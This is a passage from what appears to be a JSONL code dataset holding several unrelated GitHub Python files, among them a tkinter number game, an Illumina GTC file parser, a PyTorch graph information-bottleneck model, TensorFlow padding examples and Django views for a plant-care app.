bg=\"#72549d\",width=500, height=500,padx=30,pady=30)\r\n        self.background.grid()\r\n        \r\n        for i in range(6):\r\n            grid_row = []\r\n            for j in range(10):\r\n                self.cell = Frame(self.background, bg=\"#9e948a\",\r\n                             width=500 / 6,\r\n                             height=500 / 10)\r\n                self.cell.grid(row=i, column=j, padx=5,\r\n                          pady=5)\r\n                self.t = Button(master=self.cell, text=\"\",\r\n                           bg=\"#9e948a\",\r\n                           justify=CENTER, font=(\"Verdana\", 20, \"bold\"), width=4, height=2)\r\n                self.t._coords = i, j\r\n                self.t.grid()\r\n                grid_row.append(self.t)\r\n\r\n            self.grid_cells.append(grid_row)\r\n            \r\n    def init_matrix(self):\r\n        \r\n        self.matrix = []\r\n        for i in range(6):\r\n            self.matrix.append([])  \r\n            for j in range(10):\r\n                self.matrix[i].append(0)\r\n        self.num=np.random.choice(10,60,p=[0.181,0.169,0.15,0.134,0.117,0.084,0.066,0.05,0.033,0.016])\r\n        \r\n        self.matrix=np.reshape(self.num,(6,10))\r\n        for i in range(6):\r\n            for j in range(10):\r\n                self.matrix[i][j]+=1\r\n        \r\n        \r\n    def start_grid(self):\r\n        for i in range(len(self.matrix)):\r\n            for j in range(len(self.matrix[i])):\r\n                new_number = self.matrix[i][j]\r\n                self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_CELLS[new_number])\r\n        self.update_idletasks()        \r\n            \r\n    def countdown(self): \r\n        if self.timeleft > 0: \r\n            self.timeleft -= 1\r\n            self.timeLabel.config(text = \"Time left: \"+str(self.timeleft)) \r\n            self.timeLabel.after(1000, self.countdown)\r\n\r\n    def random_num(self):\r\n        if len(self.l)==0:\r\n            print(\"Game over!! 
Check your score\")\r\n else:\r\n \r\n random.shuffle(self.l)\r\n self.rnum=self.l[0]\r\n self.l.remove(self.l[0])\r\n self.numLabel.config(text = \"NUMBER: \"+str(self.rnum))\r\n self.list_comb.clear()\r\n self.timeLabel.after(10000, self.random_num)\r\n\r\n \r\n def game_widgets(self):\r\n self.buttonframe = tk.Frame(self)\r\n self.buttonframe.grid(row=1, column=0, columnspan=1)\r\n \r\n\r\n self.scorel=tk.Label(self.buttonframe, text = \" SCORE: \"+str(self.score),fg=\"red\",font=(\"Helvetica\", 14))\r\n self.scorel.grid(row=1, column=5)\r\n self.timeLabel=tk.Label(self.buttonframe, text = \"Time left: \" +\r\n str(self.timeleft), font = ('Helvetica', 12))\r\n self.timeLabel.grid(row=1, column=4)\r\n self.numLabel=tk.Label(self.buttonframe, text = \"NUMBER: \" +\r\n str(self.rnum), font = ('Helvetica', 12))\r\n self.numLabel.grid(row=1, column=1)\r\n \r\n if self.timeleft==100:\r\n self.countdown()\r\n self.random_num()\r\n \r\n #tk.Button(self.buttonframe, text = \"New Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame,justify=RIGHT).grid(row=1, column=10)\r\n tk.Button(self.buttonframe, text = \"INSTRUCTIONS\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#72549d\",command=self.instruction,justify=RIGHT).grid(row=1, column=12)\r\n tk.Button(self.buttonframe, text = \"MENU\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#9e948a\",command=self.start,justify=RIGHT).grid(row=1, column=14)\r\n\r\n def start(self):\r\n \"\"\"Menu page of the game where user will have two options\"\"\"\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.buttonframe.destroy()\r\n self.rootframe = tk.Frame(self)\r\n self.rootframe.grid(row=1, column=0, columnspan=1)\r\n tk.Label(self.rootframe, text = \"CHECK NUMBERS\",bg=\"#72549d\",width=80, height=25,padx=1,pady=1,fg=\"white\",font=(\"Helvetica\", 14)).grid(row=1, column=2)\r\n tk.Button(self.rootframe, text = \"Start Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame,justify=RIGHT).grid(row=2, column=1)\r\n tk.Button(self.rootframe, text = \"INSTRUCTIONS\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#72549d\",command=self.instruction,justify=RIGHT).grid(row=2, column=3)\r\n \r\n def startgame(self):\r\n \"\"\"Start the game with orginal grid by generating new number and started time\"\"\"\r\n self.score=0\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.timeleft=100\r\n self.game_widgets()\r\n self.init_grid()\r\n self.init_matrix()\r\n self.start_grid()\r\n for i in range(6):\r\n for j in range(10):\r\n self.grid_cells[i][j].bind(\"\",self.tileselect)\r\n\r\n\r\n def instruction(self):\r\n \"\"\"Instructions display on the frame when clicked\"\"\"\r\n #destroy the existing frames\r\n self.rootframe.destroy()\r\n self.background.destroy()\r\n self.rootframe = tk.Frame(self,width=200, height=200,padx=100,pady=200)\r\n self.rootframe.grid(row=1, column=0, columnspan=1)\r\n tk.Button(self.rootframe, text = \"MENU\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#9e948a\",command=self.start).grid(row=0, column=0)\r\n tk.Button(self.rootframe, text = \"Start Game\",font=(\"Verdana\", 12, \"bold\"),fg=\"#f5f5f5\",bg = \"#28b4bd\",command=self.startgame).grid(row=0, column=1)\r\n tk.Label(self.rootframe, text = \"\\nINSTRUCTIONS\",fg=\"red\",font=(\"Helvetica\", 14)).grid(row=3, column=0)\r\n lb=tk.Label(self.rootframe, text = \"\\n1. Look at the random number and time left \\n \"\r\n \"2. 
Select a pair of numbers whose sum equals the random number \\n\"\r\n                    \"3. You can also select the random number itself if it is present in the grid\\n\"\r\n                    \"4. A new random number appears every 10 sec\\n\"\r\n                    \"5. Select as many tiles as possible to increase your score\\n\"\r\n                    \"READY? START THE GAME!!\",font=(\"Helvetica\", 14))\r\n        lb.grid(row=4,column=0)\r\n        \r\n\r\n    \r\nif __name__==\"__main__\":\r\n    Start=Grid_num()\r\n    mainloop()","repo_name":"NityaKasturey01/Check-Numbers-Game","sub_path":"Check_num_game/Full-game.py","file_name":"Full-game.py","file_ext":"py","file_size_in_byte":9346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19881831673","text":"import cv2\nimport numpy as np\n\ncanvas = np.zeros((512, 512, 3), dtype=np.uint8) + 255\n# arguments: first the center, then the radius, then the color, then the thickness\n# to draw a filled circle, the thickness must be given as -1\ncv2.circle(canvas, (250, 250), 100, (0, 0, 255), thickness=5)\n\ncv2.imshow(\"canvas\", canvas)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"kundakcii/opencv-respo","sub_path":"cizim_fonksiyonlari/cember_cizme.py","file_name":"cember_cizme.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74166280489","text":"#! /usr/bin/python\n\n# zCall: A Rare Variant Caller for Array-based Genotyping\n# Jackie Goldstein\n# jigold@broadinstitute.org\n# April 5th, 2012\n\n# The Illumina provided Code was provided as-is and with no warranty as to performance and no warranty against it infringing any other party's intellectual property rights.\n\nimport struct\nimport math\n\nclass GTC:\n    ''' Class for parsing GTC file'''\n\n    def __init__(self, filename, bpmNormIDs):\n        ''' Init function for class. 
Input is a .gtc file '''\n self.f = open(filename, 'rb') # open file handler for binary file\n\n self.TOC = self.parseTOC() # parse table of contents to get location of other information\n self.sampleName = self.parseString(10) # parse sample name\n self.samplePlate = self.parseString(11) # parse sample plate\n self.sampleWell = self.parseString(12) # parse sample well\n self.clusterFile = self.parseString(100) # parse what cluster file was used\n self.snpManifest = self.parseString(101) # parse what snp manifest was used\n self.imagingDate = self.parseString(200) # parse imaging date\n self.autoCallDate = self.parseString(201) # parse autocall date\n self.autoCallVersion = self.parseString(300) # parse autocall version\n self.callRate = self.parseFloat(1006) # parse call rate\n self.lrrDev = self.parseFloat(1008) # parse SD(LRR)\n \n\n I_ctrl = 0 # control data only\n if(bpmNormIDs == 'qcplot'):\n self.rawXcontrol = self.extractIntensities(500) # parse raw x intensities into python list object\n self.rawYcontrol = self.extractIntensities(501) # parse raw y intensities into python list object\n I_ctrl = 1\n elif(bpmNormIDs == 'gtonly'):\n pass\n else:\n ## this is wrong\n self.BPMnormIDs = bpmNormIDs # list with norm ID for each snp\n# self.normalizationTransformations = self.extractNormalizationTransformations(400) # parse normalization transformation arrays into python dictionary where key is the order they appeared in the gtc file and the value is a dictionary with keys offset_x, offset_y,scale_x, scale_y, shear, theta and values are floats \n# self.normXintensities, self.normYintensities = self.normalizeIntensities()\n \n\n \n if(I_ctrl == 0):\n self.rawXintensities = self.extractIntensities(1000) # parse raw x intensities into python list object\n self.rawYintensities = self.extractIntensities(1001) # parse raw y intensities into python list object\n self.genotypes = self.extractGenotypes(1002) # parse genotypes (0,1,2,3) into python list object\n self.baseCalls = self.extractBaseCalls(1003) # parse basecalls (AT,TT,AT,--) into python list object\n\n\n\n \n def parseTOC(self):\n '''Parse Table of Contents of GTC file\n No input\n Output is a dictionary where the ID for that entry is the key and the value is the offset for that variable in the GTC file\n '''\n self.f.seek(4,0)\n line = self.f.read(4)\n\n count = struct.unpack(\"i\",line)[0] \n TOC = {}\n\n for i in range(count): \n line = self.f.read(2)\n id = struct.unpack(\"h\",line)\n line = self.f.read(4) \n offset = struct.unpack(\"I\",line)\n TOC[id[0]] = offset[0]\n\n return TOC\n\n def parseFloat(self,id):\n '''\n Extract a string variable from GTC file such as SampleName.\n Input is ID for that variable in TOC\n Output is a string\n ''' \n offset = self.TOC[id]\n self.f.seek(offset,0)\n\n line = self.f.read(4)\n x = struct.unpack(\"f\",line)[0]\n\n return x\n\n def parseString(self,id):\n '''\n Extract a string variable from GTC file such as SampleName.\n Input is ID for that variable in TOC\n Output is a string\n ''' \n offset = self.TOC[id]\n self.f.seek(offset,0)\n\n line = self.f.read(1)\n nbytes = struct.unpack(\"b\",line)[0]\n line = self.f.read(nbytes)\n type = nbytes * \"s\"\n x = \"\".join(list(struct.unpack(type, line)))\n \n return x\n\n def extractIntensities(self, id):\n '''\n Extract intensity values (x or y depending on input ID).\n Input is ID for variable of interest in TOC\n Output is a list with integer intensity values in the order they were parsed\n ''' \n intensities = []\n offset = self.TOC[id]\n\n 
self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n self.numSNPs = count\n \n for i in range(count):\n line = self.f.read(2)\n y = struct.unpack(\"H\",line)\n intensities.append(y[0])\n\n return intensities\n\n def extractNormalizationTransformations(self, id):\n '''\n Extract normalization transformation arrays\n Input is ID for Normalization Transformations in TOC.\n Output is dictionary where keys are the order xForm array appears in gtc file (ex: 1,2,3...).\n The values of the dictionary are another dictionary\n where the keys are shear, offset_x, offset_y, theta, scale_x, scale_y and the values are floats\n '''\n normTransforms = {}\n offset = self.TOC[id]\n\n self.normIDlist = list(set(self.BPMnormIDs)) # ordered list of unique normIDs\n self.normIDlist.sort()\n \n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(4)\n line = self.f.read(48)\n x = struct.unpack(\"<12f\", line)\n normTransforms[self.normIDlist[i]] = {\"offset_x\":x[0],\"offset_y\":x[1],\"scale_x\":x[2],\"scale_y\":x[3],\"shear\":x[4],\"theta\":x[5]}\n\n return normTransforms\n \n def extractBaseCalls(self, id):\n '''\n Extract base calls.\n Input is id for BaseCalls in TOC\n Output is a list with one basecall for each SNP (ex: AT, GT,AA...)\n '''\n baseCalls = []\n offset = self.TOC[id]\n\n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(2)\n calls = struct.unpack(\"ss\",line)\n baseCalls.append(calls[0] + calls[1])\n\n return baseCalls\n\n def extractGenotypes(self, id):\n '''\n Extract genotypes.\n Input is ID for Genotypes in TOC\n Output is a list with one genotype per SNP (0,1,2,3)\n '''\n genotypes = []\n offset = self.TOC[id]\n\n self.f.seek(offset,0)\n line = self.f.read(4)\n count = struct.unpack(\"i\",line)[0]\n\n for i in range(count):\n line = self.f.read(1)\n gt = struct.unpack(\"b\",line)\n genotypes.append(gt[0])\n \n return genotypes\n\n def normalizeIntensities(self):\n '''\n Use Normalization transformations to convert raw intensities to normalized intensities\n No Input\n Outputs are normalized x and y intensities in python lists\n '''\n normXIntensities = []\n normYIntensities = []\n \n for i in range(self.numSNPs):\n xraw = self.rawXintensities[i]\n yraw = self.rawYintensities[i]\n normID = self.BPMnormIDs[i]\n\n offset_x = self.normalizationTransformations[normID][\"offset_x\"]\n offset_y = self.normalizationTransformations[normID][\"offset_y\"]\n scale_x = self.normalizationTransformations[normID][\"scale_x\"]\n scale_y = self.normalizationTransformations[normID][\"scale_y\"]\n theta = self.normalizationTransformations[normID][\"theta\"]\n shear = self.normalizationTransformations[normID][\"shear\"]\n\n tempx = xraw - offset_x\n tempy = yraw - offset_y\n\n tempx2 = math.cos(theta) * tempx + math.sin(theta) * tempy\n tempy2 = -1 * math.sin(theta) * tempx + math.cos(theta) * tempy\n\n tempx3 = tempx2 - (shear * tempy2)\n tempy3 = tempy2\n\n xn = tempx3 / float(scale_x)\n yn = tempy3 / float(scale_y)\n\n if xn < 0:\n xn = 0.0\n if yn < 0:\n yn = 0.0\n\n normXIntensities.append(xn)\n normYIntensities.append(yn)\n\n return (normXIntensities, normYIntensities) \n","repo_name":"eatsai/snp_pipe","sub_path":"processdata/GTC.py","file_name":"GTC.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
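The GTC parser in the record above reads a binary table of contents as a count followed by (int16 id, uint32 offset) pairs via `struct.unpack`. A self-contained round-trip sketch of that layout, using toy values rather than a real GTC file and explicit little-endian formats (the record relies on native byte order):

```python
import io
import struct

# build a toy table of contents: count, then (id: int16, offset: uint32) pairs
entries = [(10, 128), (1000, 4096)]
buf = struct.pack("<i", len(entries))
for entry_id, offset in entries:
    buf += struct.pack("<hI", entry_id, offset)

# parse it back the way GTC.parseTOC does, one field at a time
stream = io.BytesIO(buf)
(count,) = struct.unpack("<i", stream.read(4))
toc = {}
for _ in range(count):
    (entry_id,) = struct.unpack("<h", stream.read(2))
    (offset,) = struct.unpack("<I", stream.read(4))
    toc[entry_id] = offset

print(toc)  # {10: 128, 1000: 4096}
```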
+{"seq_id":"2826112629","text":"import numpy as np\nimport pandas as pd\nimport os\nimport unicodedata\n\n# train: x\nx = {}\ntrain = os.scandir('./dataset/TRAIN')\ntrain_aws = os.scandir('./dataset/TRAIN_AWS')\nregion = {'아름동': '세종고운', '신흥동': '세종연서', '노은동': '계룡', '문창동': '오월드', '읍내동': '장동', \n '정림동': '오월드', '공주': '공주', '논산': '논산', '대천2동': '대천항', '독곶리': '대산', '동문동': '태안', \n '모종동': '아산', '신방동': '성거', '예산군': '예산', '이원면': '태안', '홍성읍': '홍북', '성성동': '성거'}\n\nfor file in region.keys():\n x = {}\n pm_datapath = './dataset/TRAIN/' + unicodedata.normalize('NFC', file) + '.csv'\n pm_data = pd.read_csv(pm_datapath, index_col=False)\n aws_datapath = './dataset/TRAIN_AWS/' + unicodedata.normalize('NFC', region[file]) + '.csv'\n aws_data = pd.read_csv(aws_datapath, index_col=False)\n \n df_x = pd.DataFrame({\n 'date': pm_data['일시'],\n 'PM': pm_data['PM2.5'],\n 'temperature': aws_data['기온(°C)'],\n 'direction': aws_data['풍향(deg)'],\n 'velocity': aws_data['풍속(m/s)'],\n 'rain': aws_data['강수량(mm)'],\n 'humidity': aws_data['습도(%)'],\n }, )\n \n df_x.to_csv(f'./data/{file}.csv', index=False)\n\n","repo_name":"drizzle0171/Assignment","sub_path":"AI-term-prj/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18535085861","text":"import os\n\ndef extract_entity_name(filename):\n return filename.split('.')[0]\n\ndef read_lines(filename):\n _file = open(os.path.join('data/meta-data', filename), 'rt')\n data = _file.read().split('\\n')\n _file.close()\n return data\n\ndef read_metadata(filename):\n metadata = []\n for column in read_lines(filename):\n if column:\n metadata.append(tuple(column.split('\\t')[:3]))\n return metadata\n\ndef prompt():\n print('\\nWhat do you looking for?')\n print('(l) List entities')\n print('(a) Show attributes of an entity')\n print('(r) Show references about entity')\n print('(x) Exit')\n return input()\n\ndef main():\n # dict entity name -> attrb\n meta = {}\n # dict id -> entity name\n keys = {}\n # dict of relationships between entities\n relationships = {}\n\n for meta_file in os.listdir('data/meta-data'):\n table_name = extract_entity_name(meta_file)\n attrb = read_metadata(meta_file)\n identifier = attrb[0][0]\n\n meta[table_name] = attrb\n keys[identifier] = table_name\n\n for key, val in meta.items():\n for col in val:\n if col[0] in keys:\n if not col[0] == meta[key][0][0]:\n relationships[key] = keys[col[0]]\n\n option = prompt()\n while option != 'x':\n if option == 'l':\n for entity_name in meta.keys():\n print(entity_name)\n elif option == 'a':\n entity_name = input('Give the name of entity: ')\n for col in meta[entity_name]:\n print(col)\n elif option == 'r':\n entity_name = input('Give the name of entity: ')\n try:\n print(relationships[entity_name])\n except KeyError as error:\n print('Key {} have no relationships'.format(error))\n else:\n print('not exists!\\n')\n option = prompt()\n\nif __name__ == '__main__':\n main()\n","repo_name":"bruferrari/py-data","sub_path":"wc-br-2014/scrub_data.py","file_name":"scrub_data.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21316284887","text":"# 给你链表的头节点 head ,每 k 个节点一组进行翻转,请你返回修改后的链表。\r\n# k 是一个正整数,它的值小于或等于链表的长度。如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。\r\n# 你不能只是单纯的改变节点内部的值,而是需要实际进行节点交换。\r\nfrom typing import Optional\r\n\r\n\r\nclass ListNode:\r\n def __init__(self, val=0, 
next=None):\r\n self.val = val\r\n self.next = next\r\nclass Solution:\r\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\r\n n=0\r\n cur=head\r\n while cur:\r\n cur=cur.next\r\n n+=1\r\n dummy=ListNode(next=head)\r\n p0=dummy\r\n pre=None\r\n cur=p0.next\r\n while n>=k:\r\n n-=k\r\n for _ in range(k):\r\n nxt=cur.next\r\n cur.next=pre\r\n pre=cur\r\n cur=nxt\r\n nxt=p0.next\r\n nxt.next=cur\r\n p0.next=pre\r\n p0=nxt\r\n return dummy.next","repo_name":"Ww0225/pythonTest","sub_path":"K个一组翻转链表.py","file_name":"K个一组翻转链表.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12680532269","text":"from django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n\n path('add_food/', AddFood, name='add_food'),\n path('delete_food//', DeleteFood.as_view(), name='delete_food'),\n path('change_food//', ChangeFood.as_view(), name='change_food'),\n\n path('add_meal/', AddMeal, name='add_meal'),\n path('delete_meal//', DeleteMeal.as_view(), name='delete_meal'),\n path('change_meal//', ChangeMeal.as_view(), name='change_meal'),\n\n path('add_racion/', AddRacion, name='add_racion'),\n path('delete_racion//', DeleteRacion, name='delete_racion'),\n path('change_racion//', ChangeRacion, name='change_racion'),\n\n path('accounts/demo_login/', demo_login, name='demo_login'),\n\n path('test', test_session, name='test'),\n\n #path('accounts/register/activate//', user_activate, name='register_activate'),\n #path('accounts/register/done/', RegisterDoneView.as_view(), name='register_done'),\n #path('accounts/register/', RegisterUserView.as_view(), name='register'),\n #path('accounts/login/', BJULoginView.as_view(), name='login'),\n\n #path('accounts/password/reset/done/', BJUPasswordResetDoneView.as_view(), name='password_reset_done'),\n #path('accounts/password/reset/', BJUPasswordResetView.as_view(), name='password_reset'),\n #path('accounts/password/confirm/complete/', BJUPasswordResetCompleteView.as_view(), name='password_reset_complete'),\n #path('accounts/password/confirm///', BJUPasswordResetConfirmView.as_view(), name='password_reset_confirm'),\n\n #path('accounts/password/change/', BJUPasswordChangeView.as_view(), name='password_change'),\n path('accounts/logout/', logout_view, name='logout'),\n path('data_transfer/', data_transfer, name='data_transfer'),\n path('data_delete/', data_delete, name='data_delete'),\n path('data/', data, name='data'),\n]\n","repo_name":"Bondilya/eda","sub_path":"bjuk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37110081890","text":"#!/usr/bin/env python3\n\nimport csv\n\nids_bks = dict()\nbks_ids = dict()\nwith open('data/userlibri_test_id.txt','r') as f:\n bks = [a.strip() for a in f.readlines()]\n\n\nwith open('/DB/UserLibri/audio_data/metadata.tsv', 'r') as f:\n reader = csv.reader(f, delimiter='\\t')\n querys = [r[0] for r in reader]\n querys.pop(0)\n for x in querys: # x = 'speaker-260-book-3748'\n print(x)\n bks_ids.setdefault(x.split('-')[3],x.split('-')[1])\n\nfor bk in bks: # bk = 'test-clean_3748'\n bkid = bk.split('_')[1] # 3748\n ids_bks.setdefault(bks_ids[bkid], set()) # 260 : (3748)\n ids_bks[bks_ids[bkid]].add(bk)\n\nwith open('data/id_to_books.txt','w') as f2:\n for key in ids_bks.keys():\n bkids = ' '.join(list(ids_bks[key]))\n 
f2.write(f'{key}\\t{bkids}\\n')","repo_name":"lcw2014/icefall","sub_path":"egs/librispeech/ASR/utils/book_to_id.py","file_name":"book_to_id.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8577410705","text":"# @File :hgib.py\n# @Github :https://github.com/wufan2021/Heterogeneous-Graph-Information-Bottleneck\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.functional import softplus\n\nfrom module.graph_lib.gcn import GCN\n\n\nclass MIEstimator(nn.Module):\n    def __init__(self, size1, size2):\n        \"\"\"Mutual Information Estimation\"\"\"\n        super(MIEstimator, self).__init__()\n        # multilayer perceptron critic\n        self.net = nn.Sequential(\n            nn.Linear(size1 + size2, 1024),\n            nn.ReLU(True),\n            nn.Linear(1024, 1024),\n            nn.ReLU(True),\n            nn.Linear(1024, 1),\n        )\n    \n    # gradient and divergence terms for the mutual information\n    # Gradient for JSD mutual information estimation and EB-based estimation\n    def forward(self, x1, x2):\n        pos = self.net(torch.cat([x1, x2], 1))  # Positive Samples\n        neg = self.net(torch.cat([torch.roll(x1, 1, 0), x2], 1))\n        return -softplus(-pos).mean() - softplus(\n            neg).mean(), pos.mean() - neg.exp().mean() + 1\n\n\nclass Encoder(nn.Module):\n    def __init__(self, in_feats, n_hidden1=512, n_hidden2=128, activation=F.relu):\n        super(Encoder, self).__init__()\n        self.base_gcn = GCN(in_feats, n_hidden1, activation)\n        self.mean_gcn = GCN(n_hidden1, n_hidden2,\n                            act=lambda x: x)\n    \n    def forward(self, g, x):\n        h = self.base_gcn(g, x)\n        mean = self.mean_gcn(g, h)\n        return mean\n    \n    \nclass HGIB(nn.Module):\n    def __init__(self, g1, g2, fts, n_hidden2=128, beta=1e-3):\n        super(HGIB, self).__init__()\n        self.g1 = g1\n        self.g2 = g2\n        self.beta = beta\n        self.encoder_v1 = Encoder(fts.shape[1])\n        # self.encoder_v2 = Encoder()\n        self.encoder_v2 = self.encoder_v1\n        self.mi_estimator = MIEstimator(n_hidden2, n_hidden2)\n        self.kl_estimator_1 = MIEstimator(n_hidden2, n_hidden2)\n        self.kl_estimator_2 = MIEstimator(n_hidden2, n_hidden2)\n\n        self.loss = None\n    \n    def forward(self, x1, x2):\n        # embedding of view1; v1 is its pooled result, likewise for view2\n        z1 = self.encoder_v1(self.g1, x1)\n        v1 = torch.mean(z1, dim=0)\n        v1 = v1.expand_as(z1)\n        \n        z2 = self.encoder_v2(self.g2, x2)\n        v2 = torch.mean(z2, dim=0)\n        v2 = v2.expand_as(z2)\n        \n        mi_gradient, mi_estimation = self.mi_estimator(z1, z2)\n        mi_gradient = mi_gradient.mean()\n        mi_estimation = mi_estimation.mean()\n        \n        skl_v1_z2, _ = self.kl_estimator_1(v1, z2)\n        skl_v2_z1, _ = self.kl_estimator_2(v2, z1)\n        skl = skl_v1_z2 + skl_v2_z1\n        skl = skl.mean()\n        \n        self.loss = -mi_gradient + self.beta * skl\n        \n        return mi_estimation\n    \n    def compute_loss(self):\n        return self.loss\n    \n    def embed(self, fts, z1w, z2w):\n        z1 = self.encoder_v1(self.g1, fts)\n        z2 = self.encoder_v2(self.g2, fts)\n        return z1 * z1w + z2 * z2w, z1, z2\n","repo_name":"jingjing12110/CIB-VQA","sub_path":"module/graph_lib/hgib.py","file_name":"hgib.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
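The `MIEstimator` in the HGIB record above scores positive pairs (aligned rows of the two views) against negatives built by rolling one view along the batch dimension, and turns the scores into a Jensen-Shannon-style bound with `softplus`. A toy sketch of that positive/negative construction, with random features and an untrained critic (shapes and sizes here are made up):

```python
import torch
import torch.nn as nn
from torch.nn.functional import softplus

torch.manual_seed(0)
critic = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1))

x1 = torch.randn(32, 4)  # view 1, batch of 32
x2 = torch.randn(32, 4)  # view 2, row i is paired with row i of x1

pos = critic(torch.cat([x1, x2], dim=1))                    # aligned pairs
neg = critic(torch.cat([torch.roll(x1, 1, 0), x2], dim=1))  # misaligned pairs
jsd_lower_bound = -softplus(-pos).mean() - softplus(neg).mean()
print(jsd_lower_bound.item())
```

Rolling by one position is a cheap way to get negatives: every row of `x2` is now paired with a different sample's `x1`, so the critic is trained to separate the joint distribution from the product of marginals.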
+{"seq_id":"42731122132","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec  4 16:45:22 2020\r\n@Description: This file illustrates some padding and copying operations on tensors.\r\ntf.pad: pads the given tensor around the specified dimensions with the specified values.\r\n    The second argument must be an (n, 2) matrix, where n is the rank of the input\r\n    and the 2 entries give the padding before and after the specified dimension.\r\ntf.tile: copies the input tensor in memory a number of times to reach the target shape.\r\n    The second argument is a list whose length equals the rank of the input; each entry\r\n    states how many times to replicate along that dimension, where 1 means unchanged.\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\na = tf.range(9)\r\na = tf.reshape(a,[3,3])\r\n\r\nprint(a)\r\n\r\n#1. tf.pad\r\n\r\nb = tf.pad(a,[[2,1],[0,0]])\r\nprint(b)\r\n# per the official docs, the second argument is an [n,2] matrix, where n is the number of input dimensions\r\n# and the 2 entries select before/after that dimension; the values give how many padding entries to add\r\n\r\nb = tf.pad(a,[[2,1],[0,1]],constant_values = 2)\r\n# add 2 rows of 2s before all rows\r\n# and 1 row of 2s after them\r\n# add 1 column of 2s after all columns\r\nprint (b)\r\n\r\n\r\n#2. data copying\r\n# unlike broadcast_to, broadcasting does not actually expand storage in memory but saves the space internally\r\n# tf.tile guarantees a full physical copy\r\n\r\nc = tf.tile(a,[1,2])\r\n# the second argument gives the replication count per dimension, so the final shape is\r\n# input.shape * 2nd arg\r\n# its length must match the rank of the input\r\nprint(c)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"Tensorflow2.0xLearning/ch4/ch4_3_fill&Copy.py","file_name":"ch4_3_fill&Copy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38057002240","text":"from distutils import bcppcompiler\r\nfrom distutils.command.upload import upload\r\nfrom multiprocessing import context\r\nfrom django.shortcuts import render\r\nfrom django.core.files.storage import FileSystemStorage\r\nfrom django.conf import urls\r\nimport pandas as pd\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nimport numpy as np\r\nimport torchvision.transforms.functional as TF\r\nimport torch\r\nfrom PIL import Image\r\nfrom applic import load_model \r\nfrom django.core.files.storage import FileSystemStorage\r\nimport json\r\n\r\n# Create your views here.\r\n\r\n######## pages ##########\r\n\r\ndef asmaa(request):\r\n    return render(request,'asmaa.html');\r\n\r\ndef predicet(request):\r\n    return render(request,'predicet.html');\r\n\r\ndef t3(request):\r\n    return render(request,'t3.html');\r\n\r\ndef page1(request):\r\n    return render(request,\"page1.html\")\r\n###############################********functions *********##################################\r\n############## care plant ###########\r\ndef result(request):\r\n    if request.method == 'GET':\r\n        context={}\r\n        var1 = int(request.GET['p1'])\r\n        df=pd.read_csv('media/tuqa.csv',encoding='utf-8')\r\n        info=df.iloc[var1-1][1]\r\n        context[\"gg\"]=info\r\n        s1 = df.iloc[var1-1][2]\r\n        s2 = df.iloc[var1-1][3]\r\n        s3 = df.iloc[var1-1][4]\r\n        s4 = df.iloc[var1-1][5]\r\n        print(\"hello\")\r\n        name = str(var1)\r\n        path_img = \"media/\"+name+\".jpg\"\r\n        context[\"url\"] = path_img\r\n        context[\"s1\"]=s1\r\n        context[\"s2\"]=s2\r\n        context[\"s3\"]=s3\r\n        context[\"s4\"]=s4\r\n    return render(request,'t3.html',context);\r\n\r\n############# backend & test image #############\r\nmodel = load_model.load_checkpoint('C:/Users/96399/Desktop/Django_project/graduation/models/checkpoint.pt')\r\nnormalize_mean = np.array([0.485, 0.456, 0.406])\r\nnormalize_std = np.array([0.229, 0.224, 0.225])\r\ndevice = 